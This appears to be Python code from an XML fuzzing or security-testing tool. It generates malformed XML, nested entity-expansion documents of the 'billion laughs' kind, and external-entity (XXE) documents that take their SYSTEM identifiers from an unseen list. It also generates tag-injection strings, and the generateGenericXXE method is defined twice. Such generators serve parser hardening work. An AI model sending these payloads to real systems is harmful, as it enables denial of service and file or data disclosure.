def generateXMLGarbage(self):
    """Queue two oversized XML strings under the 'tags' category.

    Both strings share one element name obtained from
    attackUtils.genRandom(30, b64=True). The root opening tag repeats the
    attribute name ``a`` 101 times (values 0..100) and is followed by 21
    more opening tags of the same name.

    * First string: stops after the opening tags, so nothing is closed.
    * Second string: the same prefix plus a genRandom(100, b64=True) value,
      a newline and 22 closing tags, so every opened element is closed.

    Repeated attribute names are not well-formed XML, so a conforming parser
    should reject both strings; what it does before rejecting them (memory,
    time, error text) is what a test run observes.
    """
    filler = attackUtils.genRandom(100, b64=True)
    tag = attackUtils.genRandom(30, b64=True)

    attributes = ''.join(" a=\"%d\"" % n for n in range(101))
    nested_open = ('<%s>' % tag) * 21
    nested_close = ('</%s>' % tag) * 21

    # Unterminated variant: root opening tag plus 21 nested openers.
    pieces = ['<%s' % tag, attributes, '>', nested_open]
    self.addstring(''.join(pieces), 'tags')

    # Balanced variant: same prefix, then the filler and every closing tag.
    pieces.extend([filler, '\n', nested_close, '</%s>' % tag])
    self.addstring(''.join(pieces), 'tags')
def __init__(self):
    """Set up empty containers, load tags, and pre-generate random values.

    self.getTags() runs after self.xml is created and before any random
    value is generated.
    NOTE(review): getTags() presumably populates self.xml -- confirm, it is
    not visible here.
    """
    self.wssecurity, self.xml = [], {}
    self.getTags()

    # (attribute name, first argument to genRandom); presumably a length.
    # Order matters if genRandom draws from shared random state.
    random_fields = (
        ('rnd', 300),
        ('rndUser', 300),
        ('rndPass', 300),
        ('rnd3', 3000),
        ('rnd6', 6000),
    )
    for attr_name, size in random_fields:
        setattr(self, attr_name, attackUtils.genRandom(size, b64=True))
def generateGenericXXE(self, val=101):
    """Queue a nested internal-entity document under the 'entity' category.

    Despite the name, no external (SYSTEM) entity is declared here. The DTD
    defines x0 as a genRandom(100, b64=True) value and x1..x(val-1) so that
    each entity references the previous one twice; the root element then
    references the last entity. Full expansion therefore doubles per level.
    A parser that forbids DTDs or caps entity expansion should refuse the
    document without expanding it.

    Args:
        val: number of entity levels, x0 included (default 101).
            NOTE(review): val < 1 makes the root reference an undeclared
            entity (for val=0, ``&x-1;``) -- confirm whether that is intended.
    """
    seed_text = attackUtils.genRandom(100, b64=True)
    root = attackUtils.genRandom(30, b64=True)

    doc = StringIO()
    doc.write(self.xml["xh"])  # document header supplied by the instance

    parts = ['<!DOCTYPE %s [<!ENTITY x0 \"' % root, seed_text, '\">']
    parts.extend(
        '<!ENTITY x%s \"&x%s;&x%s;\">' % (level, level - 1, level - 1)
        for level in range(1, val)
    )
    parts.append(']>')
    parts.append('<%s>&x%d;</%s>' % (root, val - 1, root))
    doc.write(''.join(parts))

    # NOTE(review): the StringIO object itself is handed over, not
    # doc.getvalue() -- confirm addstring() accepts a buffer.
    self.addstring(doc, 'entity')
def generateGenericXXE(self, val=101):
    """Build an entity-expansion test document and queue it as 'entity'.

    Layout written to the buffer, in order: the header from self.xml["xh"],
    a DOCTYPE whose internal subset declares entity x0 (a
    genRandom(100, b64=True) value) and entities x1..x(val-1), each defined
    as two references to its predecessor, then one root element whose
    content is a reference to x(val-1).

    Only internal entities are used, with no SYSTEM identifier, so this
    exercises a parser's expansion limits rather than external resolution.

    Args:
        val: total number of declared entities (default 101).
    """
    payload_text = attackUtils.genRandom(100, b64=True)
    element = attackUtils.genRandom(30, b64=True)

    out = StringIO()
    emit = out.write

    emit(self.xml["xh"])
    emit('<!DOCTYPE %s [<!ENTITY x0 \"' % element)
    emit(payload_text)
    emit('\">')

    # enumerate() yields (cur - 1, cur): each entity doubles the previous.
    for prev, cur in enumerate(range(1, val)):
        emit('<!ENTITY x%s \"&x%s;&x%s;\">' % (cur, prev, prev))

    emit(']>')
    emit('<%s>&x%d;</%s>' % (element, val - 1, element))

    # NOTE(review): addstring() receives the buffer object, not its text.
    self.addstring(out, 'entity')
def generateOSXXE(self):
    """Queue one external-entity document per entry in ``self.attacks``.

    Each document uses a fresh random element name, declares that element
    as ANY, declares entity ``xxe`` with the entry as its SYSTEM identifier,
    and references ``&xxe;`` from the root element. The result is added
    under the 'entity' category.

    self.attacks is defined outside this method. Each entry is interpolated
    into the DTD unescaped, so an entry containing a double quote would
    break the entity declaration. A parser with external entity resolution
    disabled should not dereference the identifier.
    """
    for system_id in self.attacks:
        root = attackUtils.genRandom(30, b64=True)
        doc = StringIO()
        chunks = (
            self.xml["xh"],
            '<!DOCTYPE %s [' % root,
            '<!ELEMENT %s ANY>' % root,
            '<!ENTITY xxe SYSTEM \"%s\">' % system_id,
            ']>',
            '<%s>&xxe;</%s>' % (root, root),
        )
        for chunk in chunks:
            doc.write(chunk)
        # NOTE(review): passes the StringIO object, not doc.getvalue().
        self.addstring(doc, 'entity')
def generateTagAttacks(self, param):
    """Feed three tag shapes built from *param* to generateXMLFuzzData.

    The shapes, in call order, are:
      1. an opening tag only:  <param>
      2. a complete element:   <param>RANDOM</param>
      3. a closing tag only:   </param>

    RANDOM is a genRandom(200, b64=True) value. Every call passes
    256, 64 and 'tags' through unchanged; what the two numbers mean is
    defined by generateXMLFuzzData, which is not visible here.

    Args:
        param: element name, inserted into the tags without escaping.
    """
    body = attackUtils.genRandom(200, b64=True)

    opening = ''.join(('<', param, '>'))
    element = ''.join((opening, '%s</' % body, param, '>'))

    # opening tag alone
    self.generateXMLFuzzData(opening, 256, 64, 'tags')
    # balanced element wrapping the random body
    self.generateXMLFuzzData(element, 256, 64, 'tags')
    # closing tag alone
    self.generateXMLFuzzData('</' + param + '>', 256, 64, 'tags')